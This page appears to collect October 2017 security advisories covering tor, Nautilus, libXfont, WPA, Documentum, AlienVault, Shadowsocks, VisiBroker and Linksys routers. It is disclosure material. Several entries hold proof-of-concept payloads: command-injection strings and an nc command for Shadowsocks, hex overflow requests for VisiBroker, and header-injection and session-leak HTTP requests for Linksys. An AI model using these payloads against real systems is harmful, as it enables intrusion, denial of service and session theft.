2017 m. spalio 30 d., pirmadienis
[SECURITY] [DSA 3993-1] tor security update
- -------------------------------------------------------------------------
Debian Security Advisory DSA-3993-1 security@debian.org
https://www.debian.org/security/ Moritz Muehlenhoff
October 06, 2017 https://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : tor
CVE ID : CVE-2017-0380
It was discovered that the Tor onion service could leak sensitive
information to log files if the "SafeLogging" option is set to "0".
The oldstable distribution (jessie) is not affected.
For the stable distribution (stretch), this problem has been fixed in
version 0.2.9.12-1.
We recommend that you upgrade your tor packages.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/
[SECURITY] [DSA 3994-1] nautilus security update
Debian Security Advisory DSA-3994-1 security@debian.org
https://www.debian.org/security/ Yves-Alexis Perez
October 07, 2017 https://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : nautilus
CVE ID : CVE-2017-14604
Debian Bug : 860268
Christian Boxdörfer discovered a vulnerability in the handling of
FreeDesktop.org .desktop files in Nautilus, a file manager for the GNOME
desktop environment. An attacker can craft a .desktop file intended to run
malicious commands but displayed as a innocuous document file in Nautilus. An
user would then trust it and open the file, and Nautilus would in turn execute
the malicious content. Nautilus protection of only trusting .desktop files with
executable permission can be bypassed by shipping the .desktop file inside a
tarball.
For the oldstable distribution (jessie), this problem has not been fixed yet.
For the stable distribution (stretch), this problem has been fixed in
version 3.22.3-1+deb9u1.
For the testing distribution (buster), this problem has been fixed
in version 3.26.0-1.
For the unstable distribution (sid), this problem has been fixed in
version 3.26.0-1.
We recommend that you upgrade your nautilus packages.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/
[SECURITY] [DSA 3995-1] libxfont security update
- -------------------------------------------------------------------------
Debian Security Advisory DSA-3995-1 security@debian.org
https://www.debian.org/security/ Moritz Muehlenhoff
October 10, 2017 https://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : libxfont
CVE ID : CVE-2017-13720 CVE-2017-13722
Two vulnerabilities were found in libXfont, the X11 font rasterisation
library, which could result in denial of service or memory disclosure.
For the oldstable distribution (jessie), these problems have been fixed
in version 1:1.5.1-1+deb8u1.
For the stable distribution (stretch), these problems have been fixed in
version 1:2.0.1-3+deb9u1.
We recommend that you upgrade your libxfont packages.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/
Multiple vulnerabilities in OpenText Documentum Content Server
CVE Identifier: CVE-2017-15012
Vendor: OpenText
Affected products: OpenText Documentum Content Server (all versions)
Researcher: Andrey B. Panfilov
CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Fix: not available
Description:
Opentext Documentum Content Server (formerly known as EMC Documentum Content Server)
does not properly validate input of PUT_FILE RPC-command which allows any
authenticated user to hijack arbitrary file from Content Server filesystem,
because some files on Content Server filesystem are security-sensitive
this security flaw leads to privilege escalation
CVE Identifier: CVE-2017-15013
Vendor: OpenText
Affected products: OpenText Documentum Content Server (all versions)
Researcher: Andrey B. Panfilov
CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Fix: not available
Description:
Opentext Documentum Content Server (formerly known as EMC Documentum Content Server)
contains following design gap, which allows authenticated user to gain privileges
of superuser: Content Server stores information about uploaded files in dmr_content
objects, which are queryable and "editable" (before release 7.2P02 any authenticated
user was able to edit dmr_content objects, now any authenticated user may delete
dmr_content object and them create new one with the old identifier) by
authenticated users, this allows any authenticated user to replace content of
security-sensitive dmr_content objects (for example, dmr_content related to
dm_method objects) and gain superuser privileges
CVE Identifier: CVE-2017-15014
Vendor: OpenText
Affected products: OpenText Documentum Content Server (all versions)
Researcher: Andrey B. Panfilov
CVSS v3 Base Score: 4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)
Fix: not available
Description:
Opentext Documentum Content Server (formerly known as EMC Documentum Content Server)
contains following design gap, which allows authenticated user to download arbitrary
content files regardless attacker's repository permissions:
when authenticated user upload content to repository he performs following steps:
- calls START_PUSH RPC-command
- uploads file to content server
- calls END_PUSH_V2 RPC-command, here Content Server returns DATA_TICKET (integer),
purposed to identify the location of the uploaded file on Content Server filesystem
- further user creates dmr_content object in repository, which has value of data_ticket equal
to the value of DATA_TICKET received at the end of END_PUSH_V2 call
As the result of such design any authenticated user may create his own dmr_content object,
pointing to already existing content of Content Server filesystem
CVE Identifier: CVE-2017-15276
Vendor: OpenText
Affected products: OpenText Documentum Content Server (all versions)
Researcher: Andrey B. Panfilov
CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Fix: not available
Description:
Opentext Documentum Content Server (formerly known as EMC Documentum Content Server)
contains following design gap, which allows authenticated user to gain privileges
of superuser: Content Server allows to upload content using batches (TAR archives),
when unpacking TAR archives Content Server fails to verify contents of TAR archive which
causes path traversal vulnerability via symlinks, because some files on Content Server
filesystem are security-sensitive this security flaw leads to privilege escalation
[RCESEC-2017-002][CVE-2017-14956] AlienVault USM v5.4.2 "/ossim/report/wizard_email.php" Cross-Site Request Forgery leading to Sensitive Information Disclosure
RCE Security Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
=======================
Product: AlienVault USM
Vendor URL: https://www.alienvault.com
Type: Cross-Site Request Forgery [CWE-253]
Date found: 2017-09-22
Date published: 2017-10-13
CVSSv3 Score: 6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)
CVE: CVE-2017-14956
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
AlienVault USM 5.4.2 (current)
older versions may be affected too.
4. INTRODUCTION
===============
AlienVault Unified Security Management (USM) is a comprehensive approach to
security monitoring, delivered in a unified platform. The USM platform includes
five essential security capabilities that provide resource-constrained
organizations with all the security essentials needed for effective threat
detection, incident response, and compliance, in a single pane of glass.
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
AlienVault USM v5.4.2 offers authenticated users the functionality to generate
and afterwards export generated compliance reports via the script located at
"/ossim/report/wizard_email.php". Besides offering an export via a local file
download, the script does also offer the possibility to send out any report via
email to a given address (either in PDF or XLSX format).
An exemplary request to send the pre-defined report
"PCI_DSS_3_2__Vulnerability_Details" to the email address "email@example.com"
looks like the following:
https://example.com/ossim/report/wizard_email.php?extra_data=1&name=UENJX0RTU18zXzJfX1Z1bG5lcmFiaWxpdHlfRGV0YWlscw==&format=email&pdf=true&email=email@example.com
The base64-encoded HTTP GET "name" parameter can be replaced with any other
of the approx. 240 pre-defined reports, that are shipped with AlienVault USM
since they do all have hardcoded identifiers, such as:
- Alarm_Report
- Ticket_Report
- Business_and_Compliance
- HIPAA_List_of_identified_ePHI_assets
- PCI_DSS_3_2_Database_Users_Added
- VulnerabilitiesReport
etc.
Since there is no anti-CSRF token protecting this functionality, it is
vulnerable to Cross-Site Request Forgery attacks. An exemplary exploit to send
the "PCI_DSS_3_2__Vulnerability_Details" report as a PDF-file to
"email@example.com" could look like the following:
6. RISK
=======
To successfully exploit this vulnerability a user with rights to access the
compliance reports must be tricked into visiting an arbitrary website while
having an authenticated session in the application.
The vulnerability allows remote attackers to trigger a report generation and
send the report out to an arbitrary email address, which may lead to the
disclosure of very sensitive internal reporting information stored in AlienVault
USM through pre-defined reports such as:
- Alarms
- Assets Inventory
- Compliance Reports such as PCI DSS and HIPAA
- Raw Logs
- Security Events
- Security Operations
- Tickets
- User Activity
7. SOLUTION
===========
None.
8. REPORT TIMELINE
==================
2017-09-22: Discovery of the vulnerability
2017-09-22: Sent full vulnerability details to publicly listed security email
address
2016-10-01: MITRE assigns CVE-2017-14956
2017-10-03: No response from vendor, notified vendor again
2017-10-13: No response from vendor
2017-10-13: Public disclosure according to disclosure policy
9. REFERENCES
=============
https://www.rcesecurity.com/2017/10/cve-2017-14956-alienvault-usm-leaks-sensitive-compliance-information-via-csrf
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14956
Advisory X41-2017-008: Multiple Vulnerabilities in Shadowsocks
X41 D-Sec GmbH Security Advisory: X41-2017-008
Multiple Vulnerabilities in Shadowsocks
=======================================
Overview
--------
Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6
Confirmed Patched Versions: N/A
Vendor: Shadowsocks
Vendor URL: https://github.com/shadowsocks/shadowsocks/tree/master
Vector: Network
Credit: X41 D-Sec GmbH, Niklas Abel
Status: Public
Advisory-URL:
https://www.x41-dsec.de/lab/advisories/x41-2017-008-shadowsocks/
Summary and Impact
------------------
Several issues have been identified, which allow attackers to manipulate
log files, execute commands and to brute force Shadowsocks with enabled
autoban.py brute force detection. Brute force detection from autoban.py
does not work with suggested tail command. The key of captured
Shadowsocks traffic can be brute forced.
Product Description
-------------------
Shadowsocks is a fast tunnel proxy that helps you bypass firewalls.
Log file manipulation
=====================
Severity Rating: Medium
Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6
Confirmed Patched Versions: N/A
Vector: Network
CVE: not yet issued
CWE: 117
CVSS Score: 4.3
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Summary and Impact
------------------
Log file manipulation is possible with a manipulated hostname, sent to
the server from a client, even if Shadowsocks is as quiet as possible
with "-qq".
Therefore a string like "\nI could be any log entry\n" could be sent as
hostname to Shadowsocks. The server would log an additional line with
"I could be any log entry".
Workarounds
-----------
There is no workaround available, do not trust the logfiles until a
patch is released.
Command Execution
=================
Severity Rating: Critical
Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6
Confirmed Patched Versions: N/A
Vector: Network
CVE: not yet issued
CWE: 78
CVSS Score: 9.0
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
Summary and Impact
------------------
When the brute force detection with autoban.py is enabled, remote
attackers are able to execute arbitrary commands.
Command execution is possible because of because of line 53 "os.system(cmd)"
in autoban.py, which executes "cmd = 'iptables -A INPUT -s %s -j DROP' %
ip". The "ip" parameter gets parsed from the log file, whose contents
can be controlled by a third party sending unauthenticated packets.
Proof of Concept
----------------
When, a string like "can not parse header when ||ls&:\n" is sent as host
name to Shadowsocks, it would end up in the logfile and lead to the
execution of "ls".
Autoban.py does not execute commands with spaces due to internal
sanitization. A requested hostname like:
" can not parse header when ||ls&:\ntouch /etc/evil.txt\nexit\ncan not
parse header when ||/bin/bash log 2>log &" does not block IP's.
The "for line in sys.stdin:" from autoban.py parses the input until
there is an end of file (EOF). As "tail -F" will never pipe an EOF into
the pyhon script, the sys.stdin will block the script forever. So the
"tail -F /var/log/shodowsocks | autoban.py" will never block anything
except itself.
Workarounds
-----------
Use python "autoban.py < /var/log/shadowsocks.log" in a cronjob. Do not
use autoban.py until the command execution issue gets fixed.
Bruteforcable Shadowsocks traffic because of MD5
================================================
Confirmed Affected Versions: Latest commit 2ab8c6b on Sep 6
Confirmed Patched Versions: N/A
Summary and Impact
------------------
Shadowsocks uses no brute force prevention for it's key derivation function.
The key for Shadowsocks traffic encryption is static and derived from
the password, using MD5. The password derivation is in encrypt.py in
line 56 to 63: "
while len(b''.join(m)) < (key_len + iv_len):
md5 = hashlib.md5()
data = password
if i > 0:
data = m[i - 1] + password
md5.update(data)
m.append(md5.digest())
i += 1
"
MD5 should not be used to generate keys, since it is a hash function.
A proper key derivation function increases the costs for this operation,
which is a small burden for a user, but a big one for an attacker,
which performs this operation many more times. As passwords usually have
low-entropy, a good password derivation function has to be slow.
Workarounds
-----------
Use a secure password generated by a cryptographically secure random
generator. Wait for a patch that uses a password based key derivation
function like "Argon2" instead of a hash.
About X41 D-Sec GmbH
--------------------
X41 D-Sec is a provider of application security services. We focus on
application code reviews, design review and security testing. X41 D-Sec
GmbH was founded in 2015 by Markus Vervier. We support customers in
various industries such as finance, software development and public
institutions.
Timeline
--------
2017-09-28 Issues found
2017-10-05 Vendor contacted
2017-10-09 Vendor contacted, replied to use GitHub for a full disclosure
2017-10-11 Vendor contacted, asked if the vendor is sure to want a full
disclosure
2017-10-12 Vendor contacted, replied to create a public issue on GitHub
2017-10-13 Created public issues on GitHub
2017-10-13 Advisory release
Advisory X41-2017-010: Command Execution in Shadowsocks-libev
X41 D-Sec GmbH Security Advisory: X41-2017-010
Command Execution in Shadowsocks-libev
======================================
Overview
--------
Severity Rating: High
Confirmed Affected Versions: 3.1.0
Confirmed Patched Versions: N/A
Vendor: Shadowsocks
Vendor URL: https://github.com/shadowsocks/shadowsocks-libev
Vector: Local
Credit: X41 D-Sec GmbH, Niklas Abel
Status: Public
CVE: not yet assigned
Advisory-URL:
https://www.x41-dsec.de/lab/advisories/x41-2017-010-shadowsocks-libev/
Summary and Impact
------------------
Shadowsocks-libev offers local command execution per configuration file
or/and additionally, code execution per UDP request on 127.0.0.1.
The configuration file on the file system or the JSON configuration
received via UDP request is parsed and the arguments are passed to the
"add_server" function.
The function calls "construct_command_line(manager, server);" which
returns a string from the parsed configuration.
The string gets executed at line 486 "if (system(cmd) == -1) {", so if a
configuration parameter contains "||evil command&&" within the "method"
parameter, the evil command will get executed.
The ss-manager uses UDP port 8830 to get control commands on 127.0.0.1.
By default no authentication is required, although a password can be set
with the '-k' parameter.
Product Description
-------------------
Shadowsocks-libev is a lightweight secured SOCKS5 proxy for embedded
devices and low-end boxes. The ss-manager is meant to control
Shadowsocks servers for multiple users, it spawns new servers if needed.
It is a port of Shadowsocks created by @clowwindy, and maintained by
@madeye and @linusyang.
Proof of Concept
----------------
As passed configuration requests are getting executed, the following command
will create file "evil" in /tmp/ on the server:
nc -u 127.0.0.1 8839
add: {"server_port":8003, "password":"test", "method":"||touch
/tmp/evil||"}
The code is executed through shadowsocks-libev/src/manager.c.
If the configuration file on the file system is manipulated, the code
would get executed as soon as a Shadowsocks instance is started from
ss-manage, as long as the malicious part of the configuration has not
been overwritten.
Workarounds
-----------
There is no workaround available, do not use ss-manage until a patch is
released.
About X41 D-Sec GmbH
--------------------
X41 D-Sec is a provider of application security services. We focus on
application code reviews, design review and security testing. X41 D-Sec
GmbH was founded in 2015 by Markus Vervier. We support customers in
various industries such as finance, software development and public
institutions.
Timeline
--------
2017-09-28 Issues found
2017-10-05 Vendor contacted
2017-10-09 Vendor contacted, replied to use GitHub for a full disclosure
2017-10-11 Vendor contacted, asked if the vendor is sure to want a full
disclosure
2017-10-12 Vendor contacted, replied to create a public issue on GitHub
2017-10-13 Created public issue on GitHub
2017-10-13 Advisory release
SEC Consult SA-20171016-0 :: Multiple vulnerabilities in Micro Focus VisiBroker C++
SEC Consult Vulnerability Lab Security Advisory < 20171016-0 >
=======================================================================
title: Multiple vulnerabilities
product: Micro Focus VisiBroker C++
vulnerable version: 8.5 SP2
fixed version: 8.5 SP4 HF3
CVE number: CVE-2017-9281, CVE-2017-9282, CVE-2017-9283
impact: High
homepage: https://www.microfocus.com/products/corba/visibroker/
found: 2017-04
by: W. Ettlinger (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"VisiBroker(TM) is a comprehensive CORBA environment for developing, deploying,
and managing distributed applications. Built on open industry standards and a
high-performance architecture, VisiBroker is especially suited to low-latency,
complex, data-oriented, transaction-intensive, mission-critical environments.
Using VisiBroker(R), organizations can develop, connect, and deploy complex
distributed applications that have to meet very high performance and reliability
standards. With more than 30 million licenses in use, VisiBroker is the world’s
most widely deployed CORBA Object Request Broker (ORB) infrastructure."
URL: https://www.microfocus.com/products/corba/visibroker/
Business recommendation:
------------------------
During a superficial fuzzing test, SEC Consult found several memory corruption
vulnerabilities that allow denial of service attacks or potentially arbitrary
code execution. Although the fuzzing test only had a very limited coverage,
several vulnerabilities have been identified. Assuming the code quality is
homogenous, it is possible that other parts of the application exhibit similar
issues.
SEC Consult did not attempt to fully evaluate the potential impact of the
identified vulnerabilities.
SEC Consult recommends to decommission any VisiBroker C++ component that
communicates with untrusted entities until a full security audit has been
performed. Moreover, SEC Consult recommends to restrict network access to all
CORBA services that utilize the VisiBroker C++ environment.
Vulnerability overview/description:
-----------------------------------
1) Integer Overflow / Out of Bounds Read (Denial of Service) [CVE-2017-9281]
By specifying a large value for a length field, an integer overflow occurs.
As a result, the application reads memory until a non-mapped memory region
is reached. This causes the application to encounter a segmentation fault.
2) Integer Overflow (Heap Overwrite) [CVE-2017-9282]
By specifying a manipulated value for a length field an attacker can cause an
integer overflow. This causes the application to allocate too little memory.
When the application attempts to write to this memory buffer, heap memory is
overwritten leading to denial of service or potentially arbitrary code
execution.
3) Out of Bounds Read [CVE-2017-9283]
By specifying a manipulated value for a length field, an attacker can cause
the application to read past an allocated memory region.
4) Use after Free
SEC Consult found that the application under certain circumstances tries to
access a memory region that has been deallocated before.
It is unclear whether Micro Focus fixed the root cause of this behaviour. As
the vendor was unable to reproduce the vulnerability in the current version,
Micro Focus believes that the vulnerability was fixed with a previous update.
Since SEC Consult is unsure whether Micro Focus found the root cause of the
vulnerability, we refrain from releasing proof of concept code.
Proof of concept:
-----------------
A service implementing the following IDL was used to identify the
vulnerabilities listed here:
module Bank {
interface Account {
float balance(in string test);
};
interface AccountManager {
Account open(in string name);
};
};
The implemented service was based on the Visibroker example project
"bank_agent".
1) Integer Overflow / Out of Bounds Read (Denial of Service)
The method
CORBA_MarshalOutBuffer *__cdecl CORBA_MarshalOutBuffer::put(
CORBA_MarshalOutBuffer *this,
const char *src,
unsigned int size)
is used to copy/append a char[] into a buffer. If the size of the data that is
stored in the buffer plus the size of the char[] to be appended exceeds the
allocated size, the method reallocates the buffer. By choosing the
size of the char[] as e.g. 0xffffffff (on 32 bit systems) an integer overflow
can be caused. The method then continues without allocating additional memory.
However, the application then expects that the source buffer contains 0xffffffff
bytes of memory. Since this would exceed the available process memory on 32 bit
systems, the application's attempt to copy data to the destination buffer fails
with an out of bounds read.
The following binary request demonstrates this issue for the IDL above:
47494f5001020000000000860000000203000000000000000000002b00504d430000000400000010
2f62616e6b5f6167656e745f706f610000ffffff42616e6b4d616e6167657200000000056f70656e
0000000000000002000000010000000c000000000001000100010109564953060000000500070801
83000000000000000000000e4a61636b20422e20517569636b00
2) Integer Overflow (Heap Overwrite)
The method
int __cdecl CORBA::string_alloc(unsigned int size)
is used to allocate buffers for strings. Since it allocates size + 1 bytes of
heap memory, specifying 0xffffffff causes an integer overflow leading to the
allocation of 0 bytes. This causes heap memory to be overwritten.
SEC Consult was able to use the following request to cause corruption of heap
structures:
47494f5001020000000000860000000203000000000000000000002b00504d430000000400000010
2f62616e6b5f6167656e745f706f61000000000b42616e6b4d616e6167657200000000056f70656e
0000000000000002000000010000000c000000000001000100010109564953060000000500070801
8300000000000000ffffffff4a61636b20422e20517569636b00
3) Out of Bounds Read
The constructor
int __cdecl VISServiceId::VISServiceId(
VISServiceId *this,
CORBA_MarshalInBuffer *a2,
unsigned __int32 a3,
unsigned __int8 *a4)
parses the GIOP key address. The VisiBroker key address consists of two strings.
Before each string, a long (32 bit) value specifies the length of the
string. To calculate the offset of the second string, the size of the first
string is used. If this value is chosen so that the offset of the second string
is outside of the GIOP message, an out of bounds read occurs.
The following binary request demonstrates this issue for the IDL above:
47494f5001020000000000860000000203000000000000000000002b00504d430000000480000000
2f62616e6b5f6167656e745f706f61000000000b42616e6b4d616e6167657200000000056f70656e
0000000000000002000000010000000c000000000001000100010109564953060000000500070801
83000000000000000000000e4a61636b20422e20517569636b00
4) Use after Free / Denial of Service
Micro Focus did not clearly state that the root cause of the vulnerability has
been fixed. As a precaution we refrain from releasing proof of concept code.
Vulnerable / tested versions:
-----------------------------
At least VisiBroker C++ 8.5 SP2 has been found to be vulnerable. According to
the vendor VisiBroker 8.5 prior to SP4 HF3 are vulnerable to issues #1 - #3.
Vendor contact timeline:
------------------------
2017-05-03: Contacting vendor through security@microfocus.com, attaching
encrypted security advisory
2017-05-03: Vendor: will inform us about the timeframe once the findings
have been reproduced
2017-05-26: Vendor: were able to reproduce first 3 issues; requested
further information for vulnerability #4
2017-05-30: Providing further information for vulnerability #4
2017-06-21: Requesting status update
2017-06-28: Vendor: First three issues have been fixed by the development team,
"They have reproduced the fourth and are working on it now."
2017-06-30: Vendor: Patch will be available in a few weeks
2017-07-28: Requesting status update
2017-08-02: Vendor: There is no fixed release date for the patch yet
2017-08-28: Vendor: Initial test run found an issue that has been fixed
2017-09-15: Requesting status update
2017-09-15: Vendor: "The patches were just released on the 12th and 13th"
2017-09-18: Asking for further information about CVEs, affected versions
2017-09-21: Vendor: Issue #4 has not been fixed since the team was unable to
reproduce it (the vendor stated that the issue has been reproduced,
see 2017-06-26). "They [the team] believe it was already fixed by
an earlier modification."
2017-09-27: Requesting clarification for issue #4
2017-09-27: Vendor: The team initially thought they had reproduced the issue;
this was an unrelated issue that was fixed as well.
2017-10-16: Public release of the advisory;
Solution:
---------
Upgrade to version 8.5 Service Pack 4 Hotfix 3. The release notes with
information on how to obtain this hotfix can be obtained here:
https://community.microfocus.com/microfocus/corba/visibroker_-_world_class_middleware/w/knowledge_base/29171/visibroker-8-5-service-pack-4-hotfix-3-security-fixes
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF W. Ettlinger / @2017
[SECURITY] [DSA 3999-1] wpa security update
- -------------------------------------------------------------------------
Debian Security Advisory DSA-3999-1 security@debian.org
https://www.debian.org/security/ Yves-Alexis Perez
October 16, 2017 https://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : wpa
CVE ID : CVE-2017-13077 CVE-2017-13078 CVE-2017-13079 CVE-2017-13080
CVE-2017-13081 CVE-2017-13082 CVE-2017-13086 CVE-2017-13087
CVE-2017-13088
Mathy Vanhoef of the imec-DistriNet research group of KU Leuven discovered
multiple vulnerabilities in the WPA protocol, used for authentication in
wireless networks. Those vulnerabilities applies to both the access point
(implemented in hostapd) and the station (implemented in wpa_supplicant).
An attacker exploiting the vulnerabilities could force the vulnerable system to
reuse cryptographic session keys, enabling a range of cryptographic attacks
against the ciphers used in WPA1 and WPA2.
More information can be found in the researchers's paper, Key Reinstallation
Attacks: Forcing Nonce Reuse in WPA2.
CVE-2017-13077: reinstallation of the pairwise key in the Four-way handshake
CVE-2017-13078: reinstallation of the group key in the Four-way handshake
CVE-2017-13079: reinstallation of the integrity group key in the Four-way
handshake
CVE-2017-13080: reinstallation of the group key in the Group Key handshake
CVE-2017-13081: reinstallation of the integrity group key in the Group Key
handshake
CVE-2017-13082: accepting a retransmitted Fast BSS Transition Reassociation
Request and reinstalling the pairwise key while processing it
CVE-2017-13086: reinstallation of the Tunneled Direct-Link Setup (TDLS) PeerKey
(TPK) key in the TDLS handshake
CVE-2017-13087: reinstallation of the group key (GTK) when processing a
Wireless Network Management (WNM) Sleep Mode Response frame
CVE-2017-13088: reinstallation of the integrity group key (IGTK) when
processing a Wireless Network Management (WNM) Sleep Mode
Response frame
For the oldstable distribution (jessie), these problems have been fixed
in version 2.3-1+deb8u5.
For the stable distribution (stretch), these problems have been fixed in
version 2:2.4-1+deb9u1.
For the testing distribution (buster), these problems have been fixed
in version 2:2.4-1.1.
For the unstable distribution (sid), these problems have been fixed in
version 2:2.4-1.1.
We recommend that you upgrade your wpa packages.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/
SEC Consult SA-20171018-1 :: Multiple vulnerabilities in Linksys E-series products
SEC Consult Vulnerability Lab Security Advisory < 20171018-1 >
=======================================================================
title: Multiple vulnerabilities
product: Linksys E series, see "Vulnerable / tested versions"
vulnerable version: see "Vulnerable / tested versions"
fixed version: no public fix, see solution/timeline
CVE number: -
impact: high
homepage: http://www.linksys.com/
found: 2017-06-26
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Today, Belkin International has three brands – Belkin, Linksys and WeMo
– to enhance the technology that connects us to the people, activities
and experiences we love. Belkin products are renowned for their
simplicity and ease of use, while our Linksys brand helped make
wireless connectivity mainstream around the globe. Our newest brand,
WeMo, is the leader in delivering customizable smart home experiences.
Its product platform empowers people to monitor, measure and manage
their electronics, appliances and lighting at home and on-the-go."
Source: http://www.belkin.com/uk/aboutUs/
Business recommendation:
------------------------
SEC Consult recommends not to use this product in a production environment
until a thorough security review has been performed by security
professionals and all identified issues have been resolved.
Vulnerability overview/description:
-----------------------------------
1) Denial of Service (DoS)
A denial of service vulnerability is present in the web server of the
device. This vulnerability is very simple to trigger since a single GET
request to a cgi-script is sufficient.
A crafted GET request, e.g. triggered by CSRF over a user in the
internal network, can reboot the whole device or freeze the web interface
and the DHCP service. This action does not require authentication.
2) HTTP Header Injection & Open Redirect
Due to a flaw in the web service a header injection can be triggered
without authentication. This kind of vulnerability can be used to perform
different arbitrary actions. One example in this case is an open redirection
to another web site. In the worst case a session ID of an authenticated user
can be stolen this way because the session ID is embedded into the url
which is another flaw of the web service.
3) Improper Session-Protection
The session ID for administrative users can be fetched from the device from
LAN without credentials because of insecure session handling.
This vulnerability can only be exploited when an administrator was
authenticated to the device before the attack and opened a session previously.
The login works if the attacker has the same IP address as the PC
of the legitimate administrator. Therefore, a CSRF attack is possible when
the administrator is lured to surf on a malicious web site or to click on
a malicious link.
4) Cross-Site Request Forgery Vulnerability in Admin Interface
A cross-site request forgery vulnerability can be triggered in the
administrative interface. This vulnerability can be exploited because the
session ID can be hijacked by using 3) via LAN. An exploitation via internet
is only possible if the session id is exposed to the internet (for example via
the referrer).
An attacker can change any configuration of the device by luring a user to
click on a malicious link or surf to a malicious web-site.
5) Cross-Site Scripting Vulnerability in Admin Interface
A cross-site scripting vulnerability can be triggered in the administrative
interface. This vulnerability can be exploited because the session ID can
be hijacked by using 3) via LAN. An exploitation via internet is only possible
if the session id is exposed to the internet (for example via the referrer).
By using this vulnerability, malicious code can be executed in the context of
the browser session of the attacked user.
Proof of concept:
-----------------
1) Denial of Service
Unauthenticated request for triggering a router reboot in browser:
http:///upgrade.cgi
http:///restore.cgi
Unauthenticated request for triggering a router freeze in browser:
http:///mfgtst.cgi
2) HTTP Header Injection & Open Redirect
A header injection can be triggered by the following unauthenticated request:
Request:
------------------------------------------------------------------------------
POST /UnsecuredEnable.cgi HTTP/1.1
Host:
Accept: */*
Accept-Language: en
Connection: close
Referer: http:///Unsecured.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
submit_type=&submit_button=UnsecuredEnable&gui_action=Apply&wait_time=19&next_url=INJEC%0d%0aTION&change_action=
------------------------------------------------------------------------------
Response:
------------------------------------------------------------------------------
HTTP/1.1 302 Redirect
Server: httpd
Date: Thu, 01 Jan 1970 00:27:41 GMT
Location: http://INJEC
TION
Content-Type: text/plain
Connection: close
------------------------------------------------------------------------------
Setting a new location will result in an open redirect:
Request:
------------------------------------------------------------------------------
POST /UnsecuredEnable.cgi HTTP/1.1
Host:
Accept: */*
Accept-Language: en
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
submit_type=&submit_button=UnsecuredEnable&gui_action=Apply&wait_time=19&next_url=www.sec-consult.com&change_action=
------------------------------------------------------------------------------
Response:
------------------------------------------------------------------------------
HTTP/1.1 302 Redirect
Server: httpd
Date: Thu, 01 Jan 1970 00:27:57 GMT
Location: http://www.sec-consult.com
Content-Type: text/plain
Connection: close
------------------------------------------------------------------------------
3) Improper Session-Protection
These two requests can be used to fetch the current session ID of an authenticated
user.
http:///BlockTime.asp
http:///BlockSite.asp
The response is nearly the same (except the "inetblock" and "blocksite"
functions):
-------------------------------------------------------------------------------
HTTP/1.1 200 Ok
Server: httpd
Date: Thu, 01 Jan 1970 00:04:32 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/html
[...]
function init()
{
var close_session = "0";
if ( close_session == "1" )
{
document.forms[0].action= "hndUnblock.cgi";
}
else
{
document.forms[0].action= "hndUnblock.cgi?session_id=";
}
}
[...]